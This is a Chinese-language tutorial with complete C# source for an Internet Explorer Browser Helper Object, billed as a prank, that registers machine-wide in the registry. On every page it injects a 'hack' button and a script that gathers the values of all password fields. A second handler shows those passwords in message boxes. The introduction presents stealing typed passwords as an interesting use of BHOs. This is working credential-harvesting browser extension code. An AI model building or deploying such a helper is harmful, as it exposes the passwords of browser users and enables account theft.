BHO(Browser Helper Object,浏览器辅助对象)是一种插件,它寄存在IE浏览器中运行。在咱们的日常生活中无时无刻不在使用BHO,比如:迅雷用来检测用户是否单击了下载链接的BHO。BHO可以直接访问浏览器中已加载页面的文档内容,所以用BHO也能做出些非常有意思的程序,比如窃取用户在网页上输入的密码信息等。
接下来,咱们也来制作一个恶搞的BHO吧,该BHO的功能如下:
1.注册成功后,每当用户浏览一个新的网页时,会自动在该网页中注入一个按钮
2.点击该按钮能获取用户在该网页中输入的敏感信息
操作步骤
图1
图2
图3
图4
图5
图6
图7
程序代码
IObjectWithSite.cs
using System;
using System.Collections.Generic;
using System.Text;
using System.Runtime.InteropServices;
namespace HelloBHO
{
    /// <summary>
    /// Managed declaration of the COM <c>IObjectWithSite</c> interface
    /// (IID FC4801A3-2BA9-11CF-A229-00AA003D7352), derived directly from IUnknown.
    /// </summary>
    /// <remarks>
    /// Both members carry <see cref="PreserveSigAttribute"/>, so the <c>int</c> they
    /// return is handed back to the COM caller as the HRESULT instead of being
    /// translated to or from a managed exception.
    /// </remarks>
    [ComVisible(true)]
    [InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
    [Guid("FC4801A3-2BA9-11CF-A229-00AA003D7352")]
    public interface IObjectWithSite
    {
        /// <summary>Receives the site object, marshalled as an IUnknown pointer.</summary>
        /// <param name="site">The site object supplied by the caller; may be null.</param>
        /// <returns>An HRESULT value.</returns>
        [PreserveSig]
        int SetSite([MarshalAs(UnmanagedType.IUnknown)] object site);

        /// <summary>Returns an interface pointer on the stored site.</summary>
        /// <param name="guid">IID of the interface being requested.</param>
        /// <param name="ppvSite">Receives the interface pointer.</param>
        /// <returns>An HRESULT value.</returns>
        [PreserveSig]
        int GetSite(ref Guid guid, out IntPtr ppvSite);
    }
}
BHO.cs
using System;
using System.Collections.Generic;
using System.Text;
using System.Runtime.InteropServices;
using SHDocVw;
using mshtml;
using Microsoft.Win32;
namespace HelloBHO
{
[
ComVisible(true),
Guid("8a194578-81ea-4850-9911-13ba2d71efbd"),
ClassInterface(ClassInterfaceType.None)
]
public class BHO:IObjectWithSite
{
WebBrowser webBrowser;
HTMLDocument document;
/// <summary>
/// Handler for the browser's DocumentComplete event (subscribed in SetSite).
/// Appends a script element defining <c>FindPassword()</c> to the page's head and
/// inserts a button labelled "hack" at the start of the page body.
/// </summary>
/// <remarks>
/// <c>FindPassword()</c> walks every <c>input</c> element, concatenates the value of
/// those whose type is "password", and passes the result to <c>alert()</c>.
/// Security note: the handler works on whatever document the browser object exposes,
/// so field values are readable by it no matter which site served the page. The
/// relevant control is which helper objects are registered under BHOKEYNAME.
/// </remarks>
/// <param name="pDisp">Event argument; not used by this method.</param>
/// <param name="URL">Event argument; not used by this method.</param>
public void OnDocumentComplete(object pDisp,ref object URL)
{
// Document currently held by the browser object stored in SetSite.
document = (HTMLDocument)webBrowser.Document;
// First element returned for the "head" tag.
IHTMLElement head = (IHTMLElement)((IHTMLElementCollection)document.all.tags("head")).item(null, 0);
var body = (HTMLBody)document.body;
// Add the JavaScript.
IHTMLScriptElement scriptElement = (IHTMLScriptElement)document.createElement("script");
scriptElement.type = "text/javascript";
scriptElement.text = "function FindPassword(){var tmp=document.getElementsByTagName('input');var pwdList='';for(var i=0;i<tmp.length;i++){if(tmp[i].type.toLowerCase()=='password'){pwdList+=tmp[i].value}} alert(pwdList);}";//document.getElementById('PWDHACK').value=pwdList;
((HTMLHeadElement)head).appendChild((IHTMLDOMNode)scriptElement);
// Create a node that can carry CSS.
string styleText = @".tb{position:absolute;top:100px;}";//left:100px;border:1px red solid;width:50px;height:50px;
IHTMLStyleElement tmpStyle = (IHTMLStyleElement)document.createElement("style");
tmpStyle.type = "text/css";
tmpStyle.styleSheet.cssText = styleText;
// Markup for the injected button, placed at the beginning of the body ("afterBegin").
string btnString = @"<input type='button' value='hack' οnclick='FindPassword()' />";
body.insertAdjacentHTML("afterBegin", btnString);
}
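/// <summary>
/// IObjectWithSite.SetSite: stores the site object as the browser reference and
/// subscribes <see cref="OnDocumentComplete"/> to its DocumentComplete event, or
/// detaches from the stored browser when <paramref name="site"/> is null.
/// </summary>
/// <param name="site">The site object supplied by the host, or null to release it.</param>
/// <returns>Always 0 (S_OK).</returns>
public int SetSite(object site)
{
    // Detach from any browser stored earlier. The original dereferenced the field
    // unconditionally on the null path, which throws NullReferenceException inside
    // the host process when SetSite(null) arrives before a site was ever set; it
    // also left a stale subscription behind when a second site replaced the first.
    if (webBrowser != null)
    {
        webBrowser.DocumentComplete -= new DWebBrowserEvents2_DocumentCompleteEventHandler(this.OnDocumentComplete);
        webBrowser = null;
    }

    if (site != null)
    {
        webBrowser = (WebBrowser)site;
        webBrowser.DocumentComplete += new DWebBrowserEvents2_DocumentCompleteEventHandler(this.OnDocumentComplete);
    }

    return 0;
}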
/// <summary>
/// Reads the browser's current document and, for every INPUT element whose type is
/// "password", shows that element's value in a message box.
/// </summary>
/// <remarks>
/// No subscription for this handler appears in the visible code; SetSite attaches
/// only the DocumentComplete handler. None of the by-ref event arguments is read
/// or modified here, so Cancel is left as passed in.
/// Security note: like OnDocumentComplete, this reads form field values directly
/// from the loaded document.
/// </remarks>
public void OnBeforeNavigate2(object pDisp, ref object URL, ref object Flags, ref object TargetFrameName, ref object PostData, ref object Headers, ref bool Cancel)
{
// Document currently held by the browser object stored in SetSite.
document = (HTMLDocument)webBrowser.Document;
foreach (IHTMLInputElement element in document.getElementsByTagName("INPUT"))
{
// Case-insensitive match on the input's type attribute.
if (element.type.ToLower() == "password")
{
System.Windows.Forms.MessageBox.Show(element.value);
}
}
}
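/// <summary>
/// IObjectWithSite.GetSite: queries the stored browser object for the interface
/// identified by <paramref name="guid"/>.
/// </summary>
/// <param name="guid">IID of the requested interface.</param>
/// <param name="ppvSite">Receives the interface pointer, or IntPtr.Zero when no site is stored.</param>
/// <returns>The HRESULT from QueryInterface, or E_FAIL when no site has been set.</returns>
public int GetSite(ref Guid guid, out IntPtr ppvSite)
{
    const int E_FAIL = unchecked((int)0x80004005);

    // Without a stored site, Marshal.GetIUnknownForObject(null) would throw and
    // leave the out pointer unassigned; report failure explicitly instead.
    if (webBrowser == null)
    {
        ppvSite = IntPtr.Zero;
        return E_FAIL;
    }

    IntPtr punk = Marshal.GetIUnknownForObject(webBrowser);
    try
    {
        return Marshal.QueryInterface(punk, ref guid, out ppvSite);
    }
    finally
    {
        // Balance the reference taken by GetIUnknownForObject even if the query throws.
        Marshal.Release(punk);
    }
}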
// Registry path of the Browser Helper Objects key. RegisterBHO and UnregisterBHO open it
// under HKEY_LOCAL_MACHINE and add or remove a subkey named after the class GUID.
// Security note: the subkeys of this path are what an audit of installed helper objects lists.
public static string BHOKEYNAME = "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Browser Helper Objects";
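/// <summary>
/// COM registration callback: ensures a subkey named after the class GUID (brace
/// format) exists under HKEY_LOCAL_MACHINE\BHOKEYNAME.
/// </summary>
/// <remarks>
/// Writing under HKEY_LOCAL_MACHINE typically needs elevated rights, and the change
/// is machine-wide rather than per-user.
/// </remarks>
/// <param name="type">The type being registered; its GUID names the subkey.</param>
[ComRegisterFunction]
public static void RegisterBHO(Type type)
{
    string guid = type.GUID.ToString("B");

    // Open the parent key writable, creating it when absent.
    RegistryKey registryKey = Registry.LocalMachine.OpenSubKey(BHOKEYNAME, true)
        ?? Registry.LocalMachine.CreateSubKey(BHOKEYNAME);

    // using releases both handles even if a registry call throws; the original
    // closed them only on the success path.
    using (registryKey)
    using (RegistryKey ourKey = registryKey.OpenSubKey(guid) ?? registryKey.CreateSubKey(guid))
    {
        // The subkey only has to exist; no values are written.
    }
}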
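/// <summary>
/// COM unregistration callback: deletes the subkey named after the class GUID from
/// HKEY_LOCAL_MACHINE\BHOKEYNAME, if the parent key exists.
/// </summary>
/// <param name="type">The type being unregistered; its GUID names the subkey.</param>
[ComUnregisterFunction]
public static void UnregisterBHO(Type type)
{
    string guid = type.GUID.ToString("B");

    // The original never closed this handle; using releases it on every path.
    using (RegistryKey registryKey = Registry.LocalMachine.OpenSubKey(BHOKEYNAME, true))
    {
        if (registryKey != null)
        {
            // false: do not throw when the subkey is already gone.
            registryKey.DeleteSubKey(guid, false);
        }
    }
}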
}
}
资源下载